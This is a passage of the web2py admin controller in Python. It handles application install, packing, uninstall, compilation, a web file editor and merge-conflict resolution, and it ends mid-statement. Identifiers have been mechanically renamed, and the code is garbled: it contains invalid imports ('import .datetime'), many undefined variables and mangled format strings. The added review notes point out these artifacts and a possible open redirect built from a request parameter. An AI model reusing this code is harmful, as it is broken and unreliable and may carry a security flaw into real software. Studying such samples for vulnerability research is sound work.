redirect(URL(VAR_122=request))
VAR_120 = VAR_31.vars.url
elif VAR_31.accepted and VAR_31.vars.file:
VAR_120 = request.vars.file.filename
VAR_221 = request.vars.file.file
else:
session.flash = 'No VAR_16 uploaded and no URL specified'
redirect(URL(VAR_122=request))
if VAR_221:
VAR_174 = cleanpath(VAR_31.vars.name)
VAR_212 = app_install(VAR_174, VAR_221,
request, VAR_120,
overwrite=VAR_31.vars.overwrite)
if VAR_221 and VAR_212:
VAR_155 = 'application %(VAR_174)VAR_140 VAR_212 with md5sum: %(digest)s'
if MULTI_USER_MODE:
db.app.insert(VAR_10=VAR_174, owner=auth.user.id)
FUNC_1(VAR_174)
session.flash = T(VAR_155, dict(VAR_174=appname,
digest=md5_hash(VAR_212)))
gluon.rewrite.load()
else:
VAR_155 = 'unable to install application "%(VAR_174)s"'
session.flash = T(VAR_155, dict(VAR_174=VAR_31.vars.name))
redirect(URL(VAR_122=request))
VAR_32 = re.compile('^\w+$')
if is_manager():
VAR_33 = [VAR_7 for VAR_7 in os.listdir(apath(VAR_122=request)) if VAR_32.match(VAR_7) and
VAR_7 != '__pycache__']
else:
VAR_33 = [VAR_7.name for VAR_7 in db(db.app.owner == auth.user_id).select()]
if FILTER_APPS:
VAR_33 = [VAR_7 for VAR_7 in VAR_33 if VAR_7 in FILTER_APPS]
VAR_33 = sorted(VAR_33, VAR_143=lambda VAR_7: a.upper())
VAR_34 = platform.python_version()
return dict(VAR_3=None, VAR_33=apps, VAR_27=myversion, VAR_34=myplatform,
VAR_30=form_create, VAR_31=form_update)
def FUNC_11(VAR_3):
import .datetime
VAR_20 = os.path.join(apath(VAR_3, VAR_122=request), 'progress.log')
VAR_32 = re.compile('\[(.*?)\][^\:]+\:\VAR_140+(\-?\VAR_68+)')
if not os.path.exists(VAR_20):
return []
VAR_35 = VAR_32.findall(open(VAR_20, 'r').read())
VAR_36, VAR_37 = [], 0
for VAR_156 in VAR_35:
if not VAR_156:
continue
VAR_118 = -(request.now - datetime.datetime.strptime(VAR_156[0],
'%Y-%VAR_156-%VAR_68 %H:%M:%S')).days
VAR_37 += int(VAR_156[1])
VAR_36.append([VAR_118, VAR_37])
return VAR_36
def FUNC_12():
VAR_3 = FUNC_5()
try:
if len(request.args) == 1:
VAR_120 = 'web2py.app.%VAR_140.w2p' % VAR_3
VAR_5 = app_pack(VAR_3, request, raise_ex=True)
else:
VAR_120 = 'web2py.app.%VAR_140.compiled.w2p' % VAR_3
VAR_5 = app_pack_compiled(VAR_3, request, raise_ex=True)
except Exception as VAR_114:
VAR_176 = VAR_114
VAR_5 = None
if VAR_5:
VAR_43.headers['Content-Type'] = 'application/w2p'
VAR_119 = 'attachment; VAR_5=%s' % VAR_120
VAR_43.headers['Content-Disposition'] = VAR_119
return FUNC_3(VAR_5, 'rb')
else:
session.flash = T('internal VAR_125: %s', VAR_176)
redirect(URL('site'))
def FUNC_13():
VAR_3 = FUNC_5()
if len(request.args) == 2:
VAR_120 = 'web2py.plugin.%VAR_140.w2p' % request.args[1]
VAR_5 = plugin_pack(VAR_3, request.args[1], request)
if VAR_5:
VAR_43.headers['Content-Type'] = 'application/w2p'
VAR_119 = 'attachment; VAR_5=%s' % VAR_120
VAR_43.headers['Content-Disposition'] = VAR_119
return FUNC_3(VAR_5, 'rb')
else:
session.flash = T('internal error')
redirect(URL('plugin', VAR_98=request.args))
def FUNC_14(VAR_3, VAR_11, VAR_12=None):
import .urllib
import .zipfile
VAR_38 = 'http://www.web2py.com/examples/static/VAR_40.zip'
VAR_39 = StringIO()
VAR_39.write(urlopen(VAR_38).read())
VAR_40 = zipfile.ZipFile(VAR_39, VAR_4='a')
VAR_41 = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % VAR_3
VAR_40.writestr('web2py/VAR_41.py', VAR_41.encode('utf-8'))
VAR_42 = os.path.dirname(VAR_11)
for VAR_5 in VAR_12:
VAR_120 = os.path.join(VAR_11, VAR_5)
VAR_121 = os.path.join('web2py/applications', VAR_3, VAR_5)
VAR_40.write(VAR_120, VAR_121)
VAR_40.close()
VAR_43.headers['Content-Type'] = 'application/zip'
VAR_43.headers['Content-Disposition'] = 'attachment; VAR_5=web2py.app.%VAR_140.zip' % VAR_3
VAR_39.seek(0)
return VAR_43.stream(VAR_39)
def FUNC_15():
VAR_3 = FUNC_5()
VAR_11 = apath(VAR_3, VAR_122=request)
def FUNC_58(VAR_44):
return [VAR_221 for VAR_221 in VAR_44 if not (
VAR_221[:1] in '#' or VAR_221.endswith('~') or VAR_221.endswith('.bak'))]
VAR_45 = {}
for (VAR_122, VAR_68, VAR_221) in os.walk(VAR_11):
VAR_45[VAR_122] = {'folders': FUNC_58(VAR_68), 'files': FUNC_58(VAR_221)}
if request.post_vars.file:
VAR_123 = set(os.path.relpath(os.path.join(VAR_122, VAR_221), VAR_11) for VAR_122 in VAR_45 for VAR_221 in VAR_45[VAR_122]['files'])
VAR_45 = request.post_vars.file
VAR_45 = [files] if not isinstance(VAR_45, list) else VAR_45
VAR_45 = [VAR_16 for VAR_16 in VAR_45 if VAR_16 in VAR_123]
if request.post_vars.doexe is None:
VAR_120 = 'web2py.app.%VAR_140.w2p' % VAR_3
try:
VAR_5 = app_pack(VAR_3, request, raise_ex=True, VAR_12=VAR_45)
except Exception as VAR_114:
VAR_5 = None
if VAR_5:
VAR_43.headers['Content-Type'] = 'application/w2p'
VAR_119 = 'attachment; VAR_5=%s' % VAR_120
VAR_43.headers['Content-Disposition'] = VAR_119
return FUNC_3(VAR_5, 'rb')
else:
session.flash = T('internal VAR_125: %s', VAR_114)
redirect(URL(VAR_98=request.args))
else:
return FUNC_14(VAR_3, VAR_11, VAR_45)
return locals()
def FUNC_16():
    """Confirm-and-run web2py upgrade; flash the outcome and return to site."""
    VAR_46 = FORM.confirm(T('Upgrade'),
                          {T('Cancel'): URL('site')})
    if VAR_46.accepted:
        (VAR_124, VAR_125) = upgrade(request)  # (ok_flag, error_message)
        if VAR_124:
            session.flash = T('web2py upgraded; please restart it')
        else:
            session.flash = T('unable to upgrade because "%s"', VAR_125)
        redirect(URL('site'))
    # NOTE(review): `dialog` is undefined -- renaming artifact for VAR_46.
    return dict(VAR_46=dialog)
def FUNC_17():
    """Uninstall the current application after a confirmation dialog.

    In multi-user mode only a manager or the app owner may delete the app's
    DB record; the app is packed first (as an implicit backup attempt) and
    then removed from disk via app_uninstall.
    """
    VAR_3 = FUNC_5()
    VAR_46 = FORM.confirm(T('Uninstall'),
                          {T('Cancel'): URL('site')})
    VAR_46['_id'] = 'confirm_form'
    VAR_46['_class'] = 'well'
    for VAR_126 in VAR_46.components:
        VAR_126['_class'] = 'btn'
    if VAR_46.accepted:
        if MULTI_USER_MODE:
            # Permission gate: manager may delete any app record; otherwise
            # the delete succeeds only for the owning user.
            if is_manager() and db(db.app.name == VAR_3).delete():
                pass
            elif db(db.app.name == VAR_3)(db.app.owner == auth.user.id).delete():
                pass
            else:
                session.flash = T('no permission to FUNC_17 "%s"', VAR_3)
                redirect(URL('site'))
        try:
            # Pack before removing; failure aborts the uninstall.
            VAR_5 = app_pack(VAR_3, request, raise_ex=True)
        except:
            session.flash = T('unable to FUNC_17 "%s"', VAR_3)
        else:
            if app_uninstall(VAR_3, request):
                session.flash = T('application "%s" uninstalled', VAR_3)
            else:
                session.flash = T('unable to FUNC_17 "%s"', VAR_3)
        redirect(URL('site'))
    # NOTE(review): `dialog` is undefined -- renaming artifact for VAR_46.
    return dict(VAR_3=VAR_3, VAR_46=dialog)
def FUNC_18():
    """Clean the current app's cache/errors/sessions and redirect to site."""
    VAR_3 = FUNC_5()
    VAR_47 = app_cleanup(VAR_3, request)  # False-ish means some removals failed
    if not VAR_47:
        session.flash = T("some VAR_45 could not be removed")
    else:
        session.flash = T('cache, FUNC_42 and sessions cleaned')
    redirect(URL('site'))
def FUNC_19():
    """Byte-compile the current application and flash the result.

    app_compile returns a false-ish value on full success, a list of views
    that failed (when skip_failed_views is on), or an error blob otherwise.
    """
    VAR_3 = FUNC_5()
    VAR_48 = app_compile(VAR_3, request,
                         skip_failed_views=(request.args(1) == 'skip_failed_views'))
    if not VAR_48:
        session.flash = T('application compiled')
    elif isinstance(VAR_48, list):
        # Partial success: list the views that could not be compiled.
        session.flash = DIV(*[T('application compiled'), BR(), BR(),
                              T('WARNING: The following VAR_84 could not be compiled:'), BR()] +
                            [CAT(BR(), VAR_182) for VAR_182 in VAR_48] +
                            [BR(), BR(), T('DO NOT use the "Pack compiled" feature.')])
    else:
        session.flash = DIV(T('Cannot compile: there are FUNC_42 in your VAR_3:'),
                            CODE(VAR_48))
    redirect(URL('site'))
def FUNC_20():
    """Remove the compiled (bytecode) version of the current application."""
    VAR_3 = FUNC_5()
    remove_compiled_application(apath(VAR_3, VAR_122=request))
    session.flash = T('compiled application removed')
    redirect(URL('site'))
def FUNC_21():
    """Delete a file of the current app after a confirmation dialog.

    The file path comes from request.args; on confirmation the file is
    unlinked and the line-count delta is logged via FUNC_1.
    """
    VAR_3 = FUNC_5()
    VAR_5 = '/'.join(request.args)
    # NOTE(review): the redirect target below is built from the
    # request-supplied `sender` -- confirm it is constrained by URL() to a
    # local action and cannot be abused as an open redirect.
    VAR_49 = request.vars.sender
    if isinstance(VAR_49, list):  # ## fix VAR_7 problem with Vista
        # NOTE(review): `sender` is undefined -- renaming artifact for VAR_49.
        VAR_49 = sender[0]
    VAR_46 = FORM.confirm(T('Delete'),
                          {T('Cancel'): URL(VAR_49, VAR_157=request.vars.id)})
    if VAR_46.accepted:
        try:
            VAR_177 = apath(VAR_5, VAR_122=request)
            VAR_160 = FUNC_0(open(VAR_177, 'r').read())  # lines removed, for the log
            os.unlink(VAR_177)
            FUNC_1(VAR_3, 'DELETE', VAR_5, VAR_6=-VAR_160)
            session.flash = T('file "%(VAR_5)s" deleted',
                              dict(VAR_5=filename))
        except Exception:
            session.flash = T('unable to FUNC_21 VAR_16 "%(VAR_5)s"',
                              dict(VAR_5=filename))
        redirect(URL(VAR_49, VAR_157=request.vars.id2))
    # NOTE(review): `dialog`/`filename` are undefined -- renaming artifacts.
    return dict(VAR_46=dialog, VAR_5=filename)
def FUNC_22():
    """Toggle the DISABLED marker file of the current application.

    Requires a digitally signed URL (hmac check) -- rejects with 401
    otherwise. Returns the SPAN used to relabel the toggle button.
    """
    # Signed-URL check: prevents CSRF-style triggering of this state change.
    if not URL.verify(request, hmac_key=session.hmac_key): raise HTTP(401)
    VAR_3 = FUNC_5()
    VAR_5 = os.path.join(apath(VAR_3, VAR_122=request), 'DISABLED')
    if is_gae:
        # Marker-file approach does not work on Google App Engine.
        return SPAN(T('Not supported'), _style='color:yellow')
    elif os.path.exists(VAR_5):
        # Currently disabled -> enable by removing the marker.
        os.unlink(VAR_5)
        return SPAN(T('Disable'), _style='color:green')
    else:
        # Currently enabled -> disable by writing the marker file.
        if PY2:
            FUNC_2(VAR_5, 'wb').write('disabled: True\ntime-disabled: %s' % request.now)
        else:
            VAR_200 = 'disabled: True\ntime-disabled: %s' % request.now
            FUNC_2(VAR_5, 'wb').write(VAR_200.encode('utf-8'))
        return SPAN(T('Enable'), _style='color:red')
def FUNC_23():
    """Read-only view of a file ("peek"): return its text and extension."""
    VAR_3 = FUNC_5(request.vars.app)
    VAR_5 = '/'.join(request.args)
    if request.vars.app:
        VAR_15 = abspath(VAR_5)
    else:
        VAR_15 = apath(VAR_5, VAR_122=request)
    try:
        VAR_2 = FUNC_3(VAR_15).replace('\r', '')  # normalize CRLF for display
    except IOError:
        session.flash = T('file does not exist')
        redirect(URL('site'))
    # NOTE(review): `filename`, `app`, `data`, `extension` below are
    # undefined -- renaming artifacts for VAR_5/VAR_3/VAR_2/VAR_50.
    VAR_50 = VAR_5[filename.rfind('.') + 1:].lower()
    return dict(VAR_3=app,
                VAR_5=filename,
                VAR_2=data,
                VAR_50=extension)
def FUNC_24():
    """List the app's controller files matching an optional filename pattern."""
    VAR_3 = FUNC_5()
    if len(request.args) > 1:
        VAR_16 = request.args[1]
    else:
        VAR_16 = '.*\.py'
    VAR_51 = listdir(
        apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), VAR_16 + '$')
    # NOTE(review): `controllers` is undefined -- renaming artifact for VAR_51.
    return dict(VAR_3=VAR_3, VAR_51=controllers)
def FUNC_25():
    """Placeholder action: always responds with an empty string body."""
    empty_body = ''
    return empty_body
def FUNC_26():
    """Search the app's models/controllers/views for a keyword.

    Returns JSON with the matching relative paths and a flash message.
    """
    VAR_52 = request.vars.keywords or ''
    VAR_3 = FUNC_5()

    def FUNC_59(VAR_5, VAR_52):
        # Substring match over the raw file content.
        VAR_5 = os.path.join(apath(VAR_3, VAR_122=request), VAR_5)
        if VAR_52 in read_file(VAR_5, 'r'):
            return True
        return False
    VAR_15 = apath(request.args[0], VAR_122=request)
    VAR_53 = glob(os.path.join(VAR_15, '*/*.py'))
    VAR_54 = glob(os.path.join(VAR_15, '*/*.html'))
    VAR_55 = glob(os.path.join(VAR_15, '*/*/*.html'))
    # Strip the app path prefix and normalize to forward slashes.
    VAR_45 = [x[len(VAR_15) + 1:].replace(
        '\\', '/') for x in VAR_53 + VAR_54 + VAR_55 if FUNC_59(x, VAR_52)]
    # NOTE(review): `files` is undefined -- renaming artifact for VAR_45.
    return VAR_43.json(dict(VAR_45=files, message=T.M('Searching: **%VAR_140** %%{VAR_16}', len(VAR_45))))
def FUNC_27():
    """Web-based file editor action (web2py admin "edit").

    Handles, in order: serving the editor page shell on non-ajax requests;
    loading/saving editor preferences; reverting a file from its .bak copy;
    saving posted content (with a stale-file hash check that diverts to the
    resolve/merge page); syntax-checking Python content; reloading edited
    modules; and computing the controller/view cross-links for the editor UI.
    Returns JSON for ajax clients and a rendered page otherwise.
    """
    VAR_3 = FUNC_5(request.vars.app)
    VAR_56 = apath(VAR_3, VAR_122=request)
    # Editor preference defaults, overridden by settings.cfg [editor] section.
    VAR_57 = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
    VAR_58 = Config(os.path.join(request.folder, 'settings.cfg'),
                    section='editor', default_values={})
    VAR_57.update(VAR_58.read())
    if not(request.ajax) and not(is_mobile):
        # Plain page load: serve the editor shell; file content is fetched
        # later via ajax.
        VAR_43.title = T('Editing %s') % VAR_3
        return VAR_43.render('default/FUNC_27.html', dict(VAR_3=VAR_3, editor_settings=VAR_57))
    if 'settings' in request.vars:
        if request.post_vars:  # save new VAR_57
            if PY2:
                VAR_201 = request.post_vars.items()
            else:
                VAR_201 = list(request.post_vars.items())
            # Unchecked checkboxes are absent from the POST; record them as
            # 'false' explicitly.
            VAR_201 += [(opt, 'false') for opt in VAR_57 if opt not in request.post_vars]
            if VAR_58.save(VAR_201):
                VAR_43.headers["web2py-VAR_126-flash"] = T('Preferences saved correctly')
            else:
                VAR_43.headers["web2py-VAR_126-flash"] = T('Preferences saved on session only')
            VAR_43.headers["web2py-VAR_126-command"] = "update_editor(%VAR_140);$('a[href=#editor_settings] button.close').click();" % VAR_43.json(VAR_58.read())
            return
        else:
            # GET: return the settings panel as JSON-wrapped HTML.
            VAR_178 = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
            VAR_178['plain_html'] = VAR_43.render('default/editor_settings.html', {'editor_settings': VAR_57})
            return VAR_43.json(VAR_178)
    """ File FUNC_27 handler """
    VAR_3 = FUNC_5(request.vars.app)
    VAR_5 = '/'.join(request.args)
    VAR_59 = request.args[-1]
    if request.vars.app:
        VAR_15 = abspath(VAR_5)
    else:
        VAR_15 = apath(VAR_5, VAR_122=request)
    # Derive the syntax-highlighting mode from the file extension.
    if VAR_5[-3:] == '.py':
        VAR_127 = 'python'
    elif VAR_5[-5:] == '.html':
        VAR_127 = 'html'
    elif VAR_5[-5:] == '.load':
        VAR_127 = 'html'
    elif VAR_5[-4:] == '.css':
        VAR_127 = 'css'
    elif VAR_5[-3:] == '.js':
        VAR_127 = 'javascript'
    else:
        VAR_127 = 'html'
    if ('revert' in request.vars) and os.path.exists(VAR_15 + '.bak'):
        # Revert: swap the file with its .bak copy (the current content
        # becomes the new .bak).
        try:
            VAR_2 = FUNC_3(VAR_15 + '.bak')
            VAR_179 = FUNC_3(VAR_15)
        except IOError:
            session.flash = T('Invalid action')
            if 'from_ajax' in request.vars:
                return VAR_43.json({'error': str(T('Invalid action'))})
            else:
                redirect(URL('site'))
        FUNC_4(VAR_15, VAR_2)
        VAR_128 = md5_hash(VAR_2)
        VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
        FUNC_4(VAR_15 + '.bak', VAR_179)
        VAR_43.flash = T('file "%s" of %VAR_140 restored', (VAR_5, VAR_129))
    else:
        try:
            VAR_2 = FUNC_3(VAR_15)
        except IOError:
            session.flash = T('Invalid action')
            if 'from_ajax' in request.vars:
                return VAR_43.json({'error': str(T('Invalid action'))})
            else:
                redirect(URL('site'))
        VAR_130 = FUNC_0(VAR_2)  # line count before the edit, for the log
        VAR_128 = md5_hash(VAR_2)
        VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
        if request.vars.file_hash and request.vars.file_hash != VAR_128:
            # Stale edit: file changed on disk since the client loaded it.
            # Save the client's version to <file>.1 and send to the merge UI.
            session.flash = T('file changed on disk')
            VAR_2 = request.vars.data.replace('\VAR_122\n', '\n').strip() + '\n'
            FUNC_4(VAR_15 + '.1', VAR_2)
            if 'from_ajax' in request.vars:
                return VAR_43.json({'error': str(T('file changed on disk')),
                                    'redirect': URL('resolve',
                                                    VAR_98=request.args)})
            else:
                redirect(URL('resolve', VAR_98=request.args))
        elif request.vars.data:
            # Normal save: back up current content, write the new content,
            # log the line-count delta.
            FUNC_4(VAR_15 + '.bak', VAR_2)
            VAR_2 = request.vars.data.replace('\VAR_122\n', '\n').strip() + '\n'
            FUNC_4(VAR_15, VAR_2)
            VAR_202 = FUNC_0(VAR_2)
            FUNC_1(
                VAR_3, 'EDIT', VAR_5, VAR_6=VAR_202 - VAR_130)
            VAR_128 = md5_hash(VAR_2)
            VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
            VAR_43.flash = T('file saved on %s', VAR_129)
    VAR_60 = (request.vars.data or request.vars.revert)
    VAR_61 = None
    if VAR_127 == 'python' and request.vars.data:
        # Syntax-check the posted Python source (AST-only compile) and build
        # the editor highlight span for the first error.
        import _ast
        try:
            VAR_180 = request.vars.data.rstrip().replace('\VAR_122\n', '\n') + '\n'
            compile(VAR_180, VAR_15, "exec", _ast.PyCF_ONLY_AST)
        except Exception as VAR_114:
            # Character offset of the start of the offending line.
            VAR_203 = sum([len(VAR_69) + 1 for l, VAR_69
                           in enumerate(request.vars.data.split("\n"))
                           if l < VAR_114.lineno - 1])
            if VAR_114.text and VAR_114.offset:
                VAR_213 = VAR_114.offset - (len(VAR_114.text) - len(
                    VAR_114.text.splitlines()[-1]))
            else:
                VAR_213 = 0
            VAR_61 = {'start': VAR_203, 'end': VAR_203 +
                      VAR_213 + 1, 'lineno': VAR_114.lineno, 'offset': VAR_213}
            try:
                VAR_214 = VAR_114.__class__.__name__
            except:
                VAR_214 = 'unknown exception!'
            VAR_43.flash = DIV(T('failed to compile VAR_16 because:'), BR(),
                               B(VAR_214), ' ' + T('at VAR_69 %s', VAR_114.lineno),
                               VAR_213 and ' ' +
                               T('at char %s', VAR_213) or '',
                               PRE(repr(VAR_114)))
    if VAR_60 and request.args[1] == 'modules':
        # An edited module is re-imported and reloaded so changes take effect.
        # NOTE(review): 'import .applications...' inside exec() is not valid
        # Python syntax -- looks like a transformation artifact; confirm.
        try:
            VAR_181 = '.'.join(request.args[2:])[:-3]
            exec('import .applications.%VAR_140.modules.%s' % (
                request.args[0], VAR_181))
            reload(sys.modules['applications.%VAR_140.modules.%s'
                               % (request.args[0], VAR_181)])
        except Exception as VAR_114:
            VAR_43.flash = DIV(
                T('failed to reload module because:'), PRE(repr(VAR_114)))
    VAR_62 = None  # link to the controller backing an edited view
    VAR_63 = None  # links to the views backing an edited controller
    VAR_64 = None  # link to run the edited view's action
    if VAR_127 == 'html' and len(request.args) >= 3:
        # Editing a view: link back to its controller and to the live page.
        VAR_131 = os.path.join(request.args[0], 'controllers',
                               request.args[2] + '.py')
        if os.path.exists(apath(VAR_131, VAR_122=request)):
            VAR_62 = URL('edit', VAR_98=[VAR_131.replace(os.sep, "/")])
            VAR_182 = request.args[3].replace('.html', '')
            VAR_64 = URL(request.args[0], request.args[2], VAR_182)
    elif VAR_127 == 'python' and request.args[1] == 'controllers':
        # Editing a controller: collect links to its associated view files.
        VAR_3 = FUNC_5()
        VAR_183 = os.path.splitext(request.args[2])[0]
        VAR_184 = os.path.join(VAR_3, 'views', VAR_183)
        VAR_185 = apath(VAR_184, VAR_122=request)
        VAR_186 = []
        if os.path.exists(VAR_185):
            if os.path.isdir(VAR_185):
                VAR_186 = glob(os.path.join(VAR_185, '*.html'))
        elif os.path.exists(VAR_185 + '.html'):
            VAR_186.append(VAR_185 + '.html')
        if len(VAR_186):
            VAR_63 = []
            for v in sorted(VAR_186):
                VAR_215 = os.path.split(v)[-1]
                VAR_216 = "/".join([VAR_184.replace(os.sep, "/"), VAR_215])
                VAR_63.append(A(VAR_215.split(".")[0],
                                VAR_144="editor_filelink",
                                _href=URL('edit', VAR_98=[VAR_216])))
    if len(request.args) > 2 and request.args[1] == 'controllers':
        # Expose the controller's public functions in the editor sidebar.
        VAR_132 = (request.args[2])[:-3]
        try:
            VAR_83 = find_exposed_functions(VAR_2)
            # NOTE(review): `functions` is undefined -- renaming artifact
            # for VAR_83.
            VAR_83 = functions and sorted(VAR_83) or []
        except SyntaxError as err:
            VAR_83 = ['SyntaxError:Line:%d' % err.lineno]
    else:
        (VAR_132, VAR_83) = (None, None)
    if 'from_ajax' in request.vars:
        return VAR_43.json({'file_hash': VAR_128, 'saved_on': VAR_129, 'functions': VAR_83, 'controller': VAR_132, 'application': request.args[0], 'highlight': VAR_61})
    else:
        # NOTE(review): the bare names used as values below (filename,
        # realfilename, filetype, data, edit_controller, file_hash, saved_on,
        # controller, functions, view_link, editviewlinks, file_details) are
        # undefined -- renaming artifacts for the corresponding VAR_* names.
        VAR_133 = dict(VAR_3=request.args[0],
                       VAR_160=request.vars.lineno or 1,
                       editor_settings=VAR_57,
                       VAR_5=filename,
                       VAR_59=realfilename,
                       VAR_127=filetype,
                       VAR_2=data,
                       VAR_62=edit_controller,
                       VAR_128=file_hash,
                       VAR_129=saved_on,
                       VAR_132=controller,
                       VAR_83=functions,
                       VAR_64=view_link,
                       VAR_63=editviewlinks,
                       id=IS_SLUG()(VAR_5)[0],
                       force=True if (request.vars.restore or
                                      request.vars.revert) else False)
        VAR_134 = VAR_43.render('default/edit_js.html', VAR_133)
        file_details['plain_html'] = VAR_134
        if is_mobile:
            return VAR_43.render('default.mobile/FUNC_27.html',
                                 VAR_133, editor_settings=VAR_57)
        else:
            return VAR_43.json(VAR_133)
def FUNC_28():
    """Scan the app's source folders for '# todo ...' comments.

    Returns {'todo': [{filename, matches, dir}, ...], 'app': app} where each
    match carries the comment text and its 1-based line number.
    """
    VAR_3 = request.vars.app or ''
    VAR_56 = apath('%(VAR_3)s' % {'app': VAR_3}, VAR_122=request)
    VAR_65 = ['models', 'controllers', 'modules', 'private']

    def FUNC_38(VAR_3, VAR_13, VAR_14='.*\.py$'):
        # List files in app/<dir>/ matching the pattern, skipping .bak files.
        VAR_45 = sorted(listdir(apath('%(VAR_3)VAR_140/%(VAR_13)VAR_140/' % {'app': VAR_3, 'dir': VAR_13}, VAR_122=request), VAR_14))
        VAR_45 = [x.replace(os.path.sep, '/') for x in VAR_45 if not x.endswith('.bak')]
        return VAR_45
    # Case-insensitive '# todo <text>' comment pattern.
    VAR_66 = '#\VAR_140*(todo)+\VAR_140+(.*)'
    VAR_32 = re.compile(VAR_66, re.IGNORECASE)
    VAR_67 = []
    for VAR_68 in VAR_65:
        for VAR_221 in FUNC_38(VAR_3, VAR_68):
            VAR_35 = []
            VAR_5 = apath(os.path.join(VAR_3, VAR_68, VAR_221), VAR_122=request)
            with FUNC_2(VAR_5, 'r') as f_s:
                VAR_204 = f_s.read()
            for VAR_156 in VAR_32.finditer(VAR_204):
                VAR_203 = VAR_156.start()
                # Convert the match offset into a 1-based line number.
                VAR_160 = VAR_204.count('\n', 0, VAR_203) + 1
                VAR_35.append({'text': VAR_156.group(0), 'lineno': VAR_160})
            if len(VAR_35) != 0:
                VAR_67.append({'filename': VAR_221, 'matches': VAR_35, 'dir': VAR_68})
    return {'todo': VAR_67, 'app': VAR_3}
def FUNC_29():
    """Manage named editor sessions persisted in settings.cfg.

    When session_name and files are posted, store the comma-joined file list
    under that name; always render the sessions page with current values.
    """
    VAR_58 = Config(os.path.join(request.folder, 'settings.cfg'),
                    section='editor_sessions', default_values={})
    VAR_57 = VAR_58.read()
    if request.vars.session_name and request.vars.files:
        VAR_135 = request.vars.session_name
        VAR_45 = request.vars.files
        VAR_57.update({VAR_135: ','.join(VAR_45)})
        if VAR_58.save(VAR_57.items()):
            VAR_43.headers["web2py-VAR_126-flash"] = T('Session saved correctly')
        else:
            VAR_43.headers["web2py-VAR_126-flash"] = T('Session saved on session only')
    return VAR_43.render('default/FUNC_29.html', {'editor_sessions': VAR_57})
def FUNC_30():
    """Resolve an edit conflict: show an ndiff of <file> vs <file>.1 and merge.

    GET renders a line-by-line diff table with checkboxes; POST rebuilds the
    file keeping unchanged lines plus every checked line, then returns to the
    editor.
    """
    VAR_5 = '/'.join(request.args)
    VAR_15 = apath(VAR_5, VAR_122=request)
    VAR_7 = FUNC_3(VAR_15).split('\n')
    try:
        # <file>.1 holds the client's conflicting version (written by the
        # editor's stale-save path).
        VAR_8 = FUNC_3(VAR_15 + '.1').split('\n')
    except IOError:
        session.flash = 'Other VAR_16, no longer there'
        redirect(URL('edit', VAR_98=request.args))
    VAR_68 = difflib.ndiff(VAR_7, VAR_8)

    def FUNC_60(VAR_69):
        # Render leading whitespace of a diff line so indentation survives
        # in HTML. NOTE(review): the appended literal looks like a stripped
        # '&nbsp;' entity -- confirm against the original source.
        VAR_136 = ''
        for (VAR_145, VAR_48) in enumerate(VAR_69):
            if VAR_48 == ' ':
                VAR_136 += ' '
            elif VAR_48 == ' \t':
                VAR_136 += ' '
            elif VAR_145 == 0 and VAR_48 == '?':
                pass
            else:
                break
        return XML(VAR_136)

    def FUNC_61(VAR_70):
        # Map the ndiff marker to a CSS class.
        VAR_137 = {' ': 'normal', '+': 'plus', '-': 'minus'}
        return VAR_137[VAR_70[0]]
    if request.vars:
        # Merge: keep common lines and those whose 'line%i' checkbox was set.
        VAR_48 = '\n'.join([VAR_70[2:].rstrip() for (VAR_111, VAR_70) in enumerate(VAR_68) if VAR_70[0]
                            == ' ' or 'line%i' % VAR_111 in request.vars])
        FUNC_4(VAR_15, VAR_48)
        session.flash = 'files merged'
        redirect(URL('edit', VAR_98=request.args))
    else:
        # Checkbox only for added/removed lines; '+' lines default checked.
        VAR_138 = lambda VAR_197, VAR_70: not VAR_70[:1] in ['+', '-'] and "" \
            or INPUT(_type='checkbox',
                     _name='line%i' % VAR_197,
                     VAR_9=VAR_70[0] == '+')
        VAR_139 = TABLE(*[TR(TD(VAR_138(VAR_111, VAR_70)),
                             TD(VAR_70[0]),
                             TD(FUNC_60(VAR_70[2:]),
                                TT(VAR_70[2:].rstrip())),
                             VAR_144=FUNC_61(VAR_70))
                          for (VAR_111, VAR_70) in enumerate(VAR_68) if VAR_70[0] != '?'])
        # NOTE(review): `diff`/`filename` are undefined -- renaming artifacts
        # for VAR_139/VAR_5.
        return dict(VAR_139=diff, VAR_5=filename)
def FUNC_31():
    """Edit a translation (language) dictionary file.

    Builds one input per message key (input vs textarea by length, styled by
    translated/untranslated state), and on submit writes back all values
    except those flagged for deletion with chr(127).
    """
    VAR_3 = FUNC_5()
    VAR_5 = '/'.join(request.args)
    VAR_43.title = request.args[-1]
    VAR_71 = read_dict(apath(VAR_5, VAR_122=request))
    if '__corrupted__' in VAR_71:
        # Unparseable dictionary: show the error instead of a form.
        VAR_26 = SPAN(VAR_71['__corrupted__'], VAR_144='error')
        return dict(VAR_5=filename, VAR_26=form)
    VAR_72 = sorted(VAR_71.keys(), VAR_143=lambda x: to_native(x).lower())
    VAR_73 = []
    # NOTE(review): `rows`, `key`, `filename`, `form`, `_class` used below are
    # undefined -- renaming artifacts for VAR_73/VAR_143/VAR_5/VAR_26/VAR_144.
    rows.append(H2(T('Original/Translation')))
    for VAR_143 in VAR_72:
        VAR_10 = md5_hash(VAR_143)  # stable per-key form field name
        VAR_140 = VAR_71[VAR_143]
        # Keys may carry a '\x01'-separated context prefix.
        (VAR_141, VAR_142, VAR_143) = key.partition('\x01')
        if VAR_142:
            VAR_141 = SPAN(VAR_141 + ': ', VAR_144='tm_ftag')
            VAR_145 = VAR_143
        else:
            (VAR_145, VAR_141) = (VAR_141, '')
        VAR_144 = 'untranslated' if VAR_145 == VAR_140 else 'translated'
        # Short messages get a text input, long ones a textarea.
        if len(VAR_140) <= 40:
            VAR_187 = INPUT(_type='text', _name=VAR_10, VAR_9=VAR_140,
                            _size=70, VAR_144=_class)
        else:
            VAR_187 = TEXTAREA(_name=VAR_10, VAR_9=VAR_140, _cols=70,
                               _rows=5, VAR_144=_class)
        VAR_145 = (VAR_140 != VAR_145) and VAR_145 or B(VAR_145)
        VAR_146 = DIV(LABEL(VAR_141, VAR_145, _style="font-weight:normal;"),
                      CAT(VAR_187, '\n', TAG.BUTTON(
                          T('delete'),
